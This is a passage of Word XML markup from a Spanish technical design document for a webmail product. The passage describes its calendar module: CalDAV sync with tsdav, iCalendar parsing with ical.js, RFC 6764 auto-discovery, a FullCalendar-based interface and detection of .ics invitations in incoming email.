        <w:t xml:space="preserve">. La eliminación de mutaciones (comparado con Vuex), el soporte TypeScript por defecto, y la reducción de 35-45% en boilerplate hacen de Pinia la elección natural para la gestión de estado</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[99]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="118"/>
    <w:bookmarkEnd w:id="119"/>
    <w:bookmarkStart w:id="132" w:name="módulo-de-calendario"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8. Módulo de Calendario</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La integración de calendario no es un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">nice-to-have</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sino una necesidad competitiva. Gmail, Outlook y todo cliente de correo moderno integra invitaciones de calendario (.ics) directamente en el flujo de trabajo del email</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[227]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Webmail 6.0 implementa un módulo de calendario completo con sincronización CalDAV, UI basada en FullCalendar, detección automática de invitaciones en correos, y envío de invitaciones desde el compositor. El stack tecnológico seleccionado —tsdav + ical.js + FullCalendar— proporciona una solución completa con soporte TypeScript nativo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[190]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[197]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[130]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="123" w:name="integración-caldav"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8.1 Integración CalDAV</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="120" w:name="X90aa63bbb85499351c7c132041c940b38a4c297"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8.1.1 tsdav: Cliente TypeScript para CalDAV/CardDAV</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">tsdav es la librería Node.js/TypeScript más moderna y completa para CalDAV/CardDAV: soporta WebDAV, CalDAV y CardDAV tanto en navegador como en Node.js, con autenticación OAuth2 y básica integrada, tipado TypeScript nativo, y está testeada con múltiples proveedores cloud (iCloud, Google, Fastmail, Nextcloud, Baikal). Registra aproximadamente 113,580 descargas semanales en npm y se mantiene activamente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[190]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. La librería histórica</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">dav</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">de Mozilla, que fue el pilar del ecosistema durante años, lleva 7 años sin actualizarse significativamente, posicionando a tsdav como el reemplazo de facto</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[195]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La integración de tsdav en Webmail 6.0 se realiza a través de un servicio dedicado</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">CalDAVService</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">que encapsula todas las operaciones del protocolo. Este servicio inicializa un cliente tsdav con las credenciales de la cuenta (básicas, digest u OAuth2 según el proveedor) y expone métodos para: descubrir calendarios, listar eventos, crear/actualizar/eliminar eventos, y sincronizar cambios. El soporte OAuth2 integrado de tsdav es esencial para proveedores como Google, que desde marzo de 2025 requieren OAuth2 para acceso a CalDAV</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[190]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[193]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La especificación RFC 4791 define los requisitos obligatorios para servidores CalDAV: soporte iCalendar como media type, WebDAV Class 1, WebDAV ACL (RFC 3744), transporte TLS, ETags para detección de cambios, todos los calendaring reports (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">calendar-query</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">calendar-multiget</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">free-busy-query</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), y advertising vía</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">DAV:supported-report-set</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[153]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[159]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. tsdav implementa client-side todos estos reportes, permitiendo a Webmail 6.0 operar con cualquier servidor conforme.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="120"/>
    <w:bookmarkStart w:id="121" w:name="ical.js-mozilla-para-rfc-5545"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8.1.2 ical.js (Mozilla) para RFC 5545</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ical.js de Mozilla es la librería estándar para parsing y generación de iCalendar (RFC 5545) en JavaScript. Soporta jCal (RFC 7265), vCard (RFC 6350) y jCard (RFC 7095), y es la base sobre la que se construye todo el ecosistema de calendarios web</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[197]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. ical.js no tiene dependencias externas, lo que reduce la superficie de ataque y simplifica el bundle.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Para casos de uso que requieren expansión robusta de reglas de recurrencia (RRULE), manejo de zonas horarias,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">EXDATE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">y</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">RECURRENCE-ID</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, Webmail 6.0 complementa ical.js con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">node-ical</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, un fork que mejora específicamente el soporte para entornos Node.js</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[189]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Esta combinación permite parsear eventos recurrentes complejos, expandirlos a instancias individuales para visualización en el calendario, y reconstruir el iCalendar original para modificaciones.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El flujo de parsing funciona así: el servidor obtiene el iCalendar vía tsdav (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">calendar-multiget</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), lo parsea con ical.js extrayendo componentes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">VEVENT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">VTODO</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">y</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">VTIMEZONE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, y almacena los eventos normalizados en MongoDB con campos estructurados (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">uid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">summary</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">dtstart</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">dtend</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">rrule</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">organizer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">attendees</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">location</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">status</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Los eventos recurrentes se expanden periódicamente mediante un job en BullMQ que genera las instancias concretas para las próximas 90 días, almacenándolas en una colección separada</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">calendar_instances</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">para consultas rápidas.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="121"/>
    <w:bookmarkStart w:id="122" w:name="X7fe08fb03c3ff3c1c10254a5d5e2697ed92e273"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8.1.3 Auto-discovery: DNS SRV + Well-Known + PROPFIND</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El auto-discovery CalDAV implementa el flujo definido en RFC 6764 en tres etapas progresivas</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[232]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Etapa 1: DNS SRV/TXT.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">El sistema consulta registros DNS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">_caldavs._tcp.{dominio}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">SRV para obtener el hostname y puerto del servidor CalDAV. Si existen registros TXT, estos proporcionan la ruta base del servicio.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Etapa 2: Well-Known URLs.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Si el DNS no resuelve, el sistema intenta</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /.well-known/caldav</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">en el dominio del servidor de correo, siguiendo redirecciones HTTP 301/308. Esta es la forma más común de auto-discovery en servidores modernos (Nextcloud, SOGo, Baikal).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Etapa 3: PROPFIND manual.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Como último recurso, se ejecuta un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">PROPFIND</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">en la URL raíz del servidor con profundidad 0, buscando la propiedad</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{DAV:}current-user-principal</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, que apunta a la URL del usuario actual. Desde allí, un segundo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">PROPFIND</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">calendar-home-set</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">revela las colecciones de calendario disponibles.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El resultado del auto-discovery se cachea en Redis con TTL de 7 días para evitar latencia en conexiones subsiguientes. El usuario puede sobrescribir la URL descubierta mediante configuración manual en la interfaz de cuentas.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="122"/>
    <w:bookmarkEnd w:id="123"/>
    <w:bookmarkStart w:id="127" w:name="ui-de-calendario"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8.2 UI de Calendario</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="124" w:name="fullcalendar-vistas-díasemanamesagenda"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8.2.1 FullCalendar: Vistas Día/Semana/Mes/Agenda</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">FullCalendar es el estándar de facto para componentes UI de calendario en JavaScript, con integración nativa para Vue.js vía</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">@fullcalendar/vue3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Desde la versión 5.5 soporta feeds iCalendar directamente, y existe un plugin comunitario que añade soporte CalDAV como eventSource con autenticación OAuth2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[130]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[133]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[238]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[242]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La implementación en Webmail 6.0 utiliza FullCalendar con las siguientes configuraciones: plugin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">dayGridPlugin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">para vista de mes,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">timeGridPlugin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">para vistas de día y semana,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">listPlugin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">para vista de agenda, e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">interactionPlugin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">para selección de rangos y drag-and-drop de eventos. El header de herramientas muestra navegación (anterior/siguiente/hoy), selector de vista (mes/semana/día/agenda), y el título del período actual. El locale se adapta automáticamente según la preferencia del usuario.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cada evento se renderiza con colores derivados del calendario padre (configurables por el usuario con selector de color de 18 tonos predefinidos). Los eventos de todo el día aparecen en la sección superior del día (all-day slot de 28px de altura). Los eventos temporales muestran su hora de inicio en formato 24h, título truncado a 2 líneas, e indicador de color del calendario como borde izquierdo de 3px. Los eventos con invitados pendientes muestran un pequeño badge de estado: amarillo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">#F4B400</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">para</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">pendiente de respuesta</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, verde</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">#34A853</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">para</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">aceptado</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, rojo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">#EA4335</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">para</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">declinado</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El calendario soporta las siguientes interacciones: clic en evento abre panel de detalle (título, horario, ubicación, descripción, lista de asistentes con estados), clic en celda vacía abre el composer de nuevo evento con la fecha/hora pre-llenada, drag-and-drop para mover eventos (con confirmación para eventos recurrentes:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">¿Modificar solo esta instancia o toda la serie?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), y resize para ajustar duración de eventos temporales.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="124"/>
    <w:bookmarkStart w:id="125" w:name="X385c5f5c504f484b941c389f05ac58debef2682"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8.2.2 Integración Email ↔ Calendario: Detección .ICS, Preview Aceptar/Declinar</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Una de las funcionalidades diferenciadoras de Webmail 6.0 es la detección automática de invitaciones de calendario en los correos entrantes. Cuando el sistema parsea un email con PostalMime y detecta un adjunto con extensión</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.ics</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">o tipo MIME</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">text/calendar</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, extrae el componente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">METHOD:REQUEST</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">o</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">METHOD:PUBLISH</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">del iCalendar y genera una tarjeta de preview in-line en el reading pane</w:t>
